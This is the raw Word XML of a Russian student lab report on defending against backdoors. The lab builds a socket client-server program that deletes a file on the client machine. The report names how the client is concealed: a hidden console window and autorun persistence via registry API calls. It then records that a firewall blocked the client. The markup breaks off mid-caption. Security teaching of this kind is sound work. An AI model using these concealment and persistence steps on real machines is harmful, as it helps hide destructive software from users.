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782FE" w14:textId="77777777" w:rsidR="009B1A71" w:rsidRPr="006A0481" w:rsidRDefault="009B1A71" w:rsidP="00527CA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EC90BC2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31D5083D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54A9E240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459A624" w14:textId="77777777" w:rsidR="009B1A71" w:rsidRDefault="009B1A71" w:rsidP="009B1A71">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E477457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26470F77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0F290440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3394D1AF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6F3CF685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10CA4541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3ACF88AF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46BB72A6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202A1250" w14:textId="77777777" w:rsidR="009B1A71" w:rsidRDefault="009B1A71" w:rsidP="009B1A71">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="090D4FE5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5EBECCF2" w14:textId="47A20B89" w:rsidR="009B1A71" w:rsidRPr="00601F8B" w:rsidRDefault="009B1A71" w:rsidP="009B1A7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C558F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C94810" w14:textId="77777777" w:rsidR="009B1A71" w:rsidRDefault="009B1A71" w:rsidP="009B1A7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CDE7A16" w14:textId="42B862C0" w:rsidR="009B1A71" w:rsidRPr="00046A26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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00046A26">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="006C558F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Защита от встраиваемых потайных ходов</w:t>
      </w:r>
      <w:r w:rsidRPr="00046A26">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFE6387" w14:textId="77777777" w:rsidR="009B1A71" w:rsidRPr="006A0481" w:rsidRDefault="009B1A71" w:rsidP="009B1A7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33CFB19" w14:textId="4B3E9A8B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>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>«Основы информационной безопасности»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3579CBBE" w14:textId="77777777" w:rsidR="009B1A71" w:rsidRDefault="009B1A71" w:rsidP="009B1A71"/>
    <w:p w14:paraId="1C8A13D0" w14:textId="77777777" w:rsidR="009B1A71" w:rsidRDefault="009B1A71" w:rsidP="009B1A71"/>
    <w:p w14:paraId="7826D997" w14:textId="77777777" w:rsidR="009B1A71" w:rsidRDefault="009B1A71" w:rsidP="009B1A71"/>
    <w:p w14:paraId="05767D8E" w14:textId="77777777" w:rsidR="009B1A71" w:rsidRDefault="009B1A71" w:rsidP="009B1A71"/>
    <w:p w14:paraId="2DBB6244" w14:textId="77777777" w:rsidR="009B1A71" w:rsidRDefault="009B1A71" w:rsidP="009B1A71"/>
    <w:p w14:paraId="08B58E98" w14:textId="77777777" w:rsidR="009B1A71" w:rsidRPr="00B57B60" w:rsidRDefault="009B1A71" w:rsidP="00527CA1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0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B0B2B0D" w14:textId="33DF7DFC" w:rsidR="009B1A71" w:rsidRPr="00B57B60" w:rsidRDefault="009B1A71" w:rsidP="00E717C4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студент гр.                                                       </w:t>
      </w:r>
      <w:r w:rsidR="006500B7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">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67F3EE8" w14:textId="77777777" w:rsidR="009B1A7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</w:p>
    <w:p w14:paraId="728804FB" w14:textId="77777777" w:rsidR="00527CA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6CACA1B" w14:textId="66FE9408" w:rsidR="009B1A71" w:rsidRPr="00527CA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 w:rsidRPr="00527CA1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>асс. преподавателя</w:t>
      </w:r>
      <w:r w:rsidRPr="00527CA1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00527CA1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidR="00527CA1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                    </w:t>
      </w:r>
      <w:r w:rsidRPr="00527CA1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Панков </w:t>
      </w:r>
      <w:r w:rsidR="00A26BF4" w:rsidRPr="00527CA1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>И. Д.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB81C8F" w14:textId="77777777" w:rsidR="009B1A71" w:rsidRPr="00C53ADA" w:rsidRDefault="009B1A71" w:rsidP="006500B7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4962"/>
          <w:tab w:val="left" w:pos="6840"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567" w:firstLine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E2CA757" w14:textId="77777777" w:rsidR="009B1A71" w:rsidRPr="00B57B60" w:rsidRDefault="009B1A71" w:rsidP="009B1A71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21C8527" w14:textId="77777777" w:rsidR="009B1A71" w:rsidRPr="006A0481" w:rsidRDefault="009B1A71" w:rsidP="009B1A7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B2D0D20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5D43F0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7043AAE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84C2604" w14:textId="77777777" w:rsidR="009B1A71" w:rsidRDefault="009B1A71" w:rsidP="009B1A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C5B2426" w14:textId="77777777" w:rsidR="009B1A71" w:rsidRDefault="009B1A71" w:rsidP="009B1A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F867E3A" w14:textId="77777777" w:rsidR="009B1A71" w:rsidRDefault="009B1A71" w:rsidP="00527CA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05A5484C" w14:textId="77777777" w:rsidR="009B1A71" w:rsidRPr="006A0481" w:rsidRDefault="009B1A71" w:rsidP="00527C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0D33B31" w14:textId="77777777" w:rsidR="009B1A71" w:rsidRPr="00046A26" w:rsidRDefault="009B1A71" w:rsidP="00527C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46A26">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32928764" w14:textId="77777777" w:rsidR="009B1A71" w:rsidRDefault="009B1A71" w:rsidP="009B1A7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4EE9EA6" w14:textId="5FF64F79" w:rsidR="001931B0" w:rsidRPr="001931B0" w:rsidRDefault="009B1A71" w:rsidP="001931B0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="240"/>
        <w:ind w:left="709" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D740EB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Цель работы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5169D13F" w14:textId="638D32A1" w:rsidR="006C558F" w:rsidRDefault="006C558F" w:rsidP="001931B0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:before="240"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C558F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Приобретение навыков по анализу структуры, функциональности и угроз специально встраиваемого дефекта программного продукта — потайного хода (backdoor), а также изучение методов защиты от уязвимости такого вида.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2040EA79" w14:textId="14AD24CF" w:rsidR="009B1A71" w:rsidRDefault="009B1A71" w:rsidP="001931B0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="240"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Постановка задачи</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA74F78" w14:textId="595ECCA2" w:rsidR="003B29BF" w:rsidRPr="005E0B1F" w:rsidRDefault="006C558F" w:rsidP="001931B0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:ind w:left="0" w:firstLine="709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Реализовать клиент-серверную программу, использующую сокеты для сетевого соединения и выполняющую удаление файла на компьютере с программой-клиентом</w:t>
      </w:r>
      <w:r w:rsidR="003B29BF" w:rsidRPr="005E0B1F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1923820A" w14:textId="2A679025" w:rsidR="00160694" w:rsidRDefault="006C558F" w:rsidP="001931B0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:ind w:left="0" w:firstLine="709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Добавить в программу клиента процедуру маскировки</w:t>
      </w:r>
      <w:r w:rsidR="00160694" w:rsidRPr="009A3A15">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BF51ED" w14:textId="77777777" w:rsidR="004F1703" w:rsidRPr="004F1703" w:rsidRDefault="004F1703" w:rsidP="004F1703">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:suppressAutoHyphens/>
        <w:ind w:left="709" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F1703">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Теоретические сведения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB6A76D" w14:textId="77777777" w:rsidR="004F1703" w:rsidRPr="004F1703" w:rsidRDefault="004F1703" w:rsidP="004F1703">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:suppressAutoHyphens/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F1703">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Потайные ходы – это программные компоненты, специально встроенные в программу с целью скрытого получения несанкционированного доступа к данным или для удаленного управления вычислительной системой.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7941A828" w14:textId="77777777" w:rsidR="004F1703" w:rsidRPr="004F1703" w:rsidRDefault="004F1703" w:rsidP="004F1703">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:suppressAutoHyphens/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F1703">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сокеты — название программного интерфейса для обеспечения обмена данными между процессами. Процессы при таком обмене могут исполняться как на одной ЭВМ, так и на различных ЭВМ, связанных между собой сетью. При реализации клиент-серверного приложения были использованы INET-сокеты (IP-сокеты, network sockets), позволяющие выполнять коммуникацию между процессами по сети.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DD0323" w14:textId="2C032894" w:rsidR="004F1703" w:rsidRPr="004F1703" w:rsidRDefault="004F1703" w:rsidP="004F1703">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:suppressAutoHyphens/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F1703">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Протокол TCP/IP основывается на соединениях, устанавливаемых между двумя компьютерами, поэтому различают сокет клиента и сокет сервера. TCP протокол отвечает за установление и поддержание соединения, сегментацию, доставку и буферизацию данных, упорядочивание и избавление от дублированных TCP-сегментов данных, контроль ошибок и скорости передачи.</w:t>
      </w:r>
      <w:r w:rsidR="00EB25C4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Отличается большей достоверностью передачи данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9B015F" w14:textId="2FC1D663" w:rsidR="004F1703" w:rsidRDefault="004F1703" w:rsidP="004F1703">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:suppressAutoHyphens/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F1703">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Межсетевой экран — программный элемент компьютерной сети, осуществляющий контроль и фильтрацию проходящего через него сетевого трафика в соответствии с заданными правилами.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4A66B0" w14:textId="77777777" w:rsidR="004F1703" w:rsidRPr="004F1703" w:rsidRDefault="004F1703" w:rsidP="004F1703">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:suppressAutoHyphens/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6211B042" w14:textId="06B310DF" w:rsidR="00BA4AA0" w:rsidRDefault="00BA4AA0" w:rsidP="00BA4AA0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Алгоритм разработанных программ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C862F8" w14:textId="77777777" w:rsidR="00BA4AA0" w:rsidRDefault="00BA4AA0" w:rsidP="00BA4AA0">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:keepNext/>
        <w:suppressAutoHyphens/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BA4AA0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33C2C420" wp14:editId="76D163AD">
            <wp:extent cx="4837940" cy="5623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39" t="3318" r="8144" b="3037"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4865785" cy="565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DE56F" w14:textId="0C648C85" w:rsidR="00BA4AA0" w:rsidRDefault="00BA4AA0" w:rsidP="00BA4AA0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BA4AA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A4AA0">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00BA4AA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A4AA0">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004F1703">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA4AA0">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BA4AA0">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Блок-схема разработанного алгоритма</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086F921A" w14:textId="77777777" w:rsidR="001931B0" w:rsidRPr="001931B0" w:rsidRDefault="001931B0" w:rsidP="001931B0"/>
    <w:p w14:paraId="24D1FE5C" w14:textId="560E72FF" w:rsidR="00867CFE" w:rsidRDefault="00B973F4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Описание </w:t>
      </w:r>
      <w:r w:rsidR="009A3A15">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>методов маскировки программы-клиента</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B04C43B" w14:textId="5221DADE" w:rsidR="00B973F4" w:rsidRDefault="009A3A15" w:rsidP="009A3A15">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A3A15">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Для скрытия окна программы-клиента использовалась функция ShowWindow (GetConsoleWindow(), SW_HIDE) из заголовочного файла windows.h.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12608F88" w14:textId="77777777" w:rsidR="006E171C" w:rsidRDefault="009A3A15" w:rsidP="009A3A15">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A3A15">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Чтобы программа автоматически запускалась, нужно добавить ее в реестр автозагрузки. Для этого используются функции: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576B14E0" w14:textId="4A12F4F6" w:rsidR="006E171C" w:rsidRDefault="009A3A15" w:rsidP="006E171C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:ind w:left="709" w:hanging="425"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E171C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RegOpenKey</w:t>
      </w:r>
      <w:r w:rsidR="006E171C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E171C" w:rsidRPr="006C558F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r w:rsidRPr="006E171C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>открывает</w:t>
      </w:r>
      <w:r w:rsidRPr="006E171C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E171C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>реестр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E171C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BC15BB" w14:textId="544C5283" w:rsidR="006E171C" w:rsidRPr="006E171C" w:rsidRDefault="009A3A15" w:rsidP="006E171C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:ind w:left="709" w:hanging="425"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E171C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RegSetValueEx</w:t>
      </w:r>
      <w:r w:rsidRPr="006E171C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E171C" w:rsidRPr="006C558F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r w:rsidRPr="006E171C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>устанавливает тип и значение к реестру</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DEF4B1" w14:textId="620DE9F8" w:rsidR="006E171C" w:rsidRPr="004F1703" w:rsidRDefault="009A3A15" w:rsidP="00657FD7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:ind w:left="709" w:hanging="425"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E171C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>RegCloseKey</w:t>
      </w:r>
      <w:r w:rsidR="006E171C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E171C" w:rsidRPr="006C558F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r w:rsidRPr="006E171C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>закрывает реестр.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5082BDCB" w14:textId="77777777" w:rsidR="004F1703" w:rsidRDefault="004F1703" w:rsidP="004F1703">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:keepNext/>
        <w:suppressAutoHyphens/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4961EDE7" wp14:editId="4E6F2D52">
            <wp:extent cx="5090160" cy="11207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47" t="9122" r="54852" b="74165"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5163413" cy="113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5BA9E" w14:textId="5A0059EC" w:rsidR="004F1703" w:rsidRPr="004F1703" w:rsidRDefault="004F1703" w:rsidP="004F1703">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F170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F1703">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="004F170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F1703">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="004F1703">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="004F1703">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="004F1703">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Добавление приложения клиента в автозагрузку</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53828984" w14:textId="7E66228A" w:rsidR="00B973F4" w:rsidRDefault="00C65DA7" w:rsidP="008E4848">
      <w:pPr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Результаты наблюдения за межсетевым экраном</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CB51F5" w14:textId="2C3EBA60" w:rsidR="00C65DA7" w:rsidRPr="00C65DA7" w:rsidRDefault="00C65DA7" w:rsidP="00C65DA7">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:ind w:firstLine="709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После запуска приложения клиента с установленным межсетевым экраном оно сразу же было заблокировано.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A981EF" w14:textId="77777777" w:rsidR="00C65DA7" w:rsidRDefault="00C65DA7" w:rsidP="00C65DA7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3398FAC9" wp14:editId="38DC2919">
            <wp:extent cx="5266690" cy="16694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882" t="16591" r="14560" b="53590"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5285420" cy="16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801ED" w14:textId="35856855" w:rsidR="00C65DA7" w:rsidRPr="00BC740F" w:rsidRDefault="00C65DA7" w:rsidP="00C65DA7">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
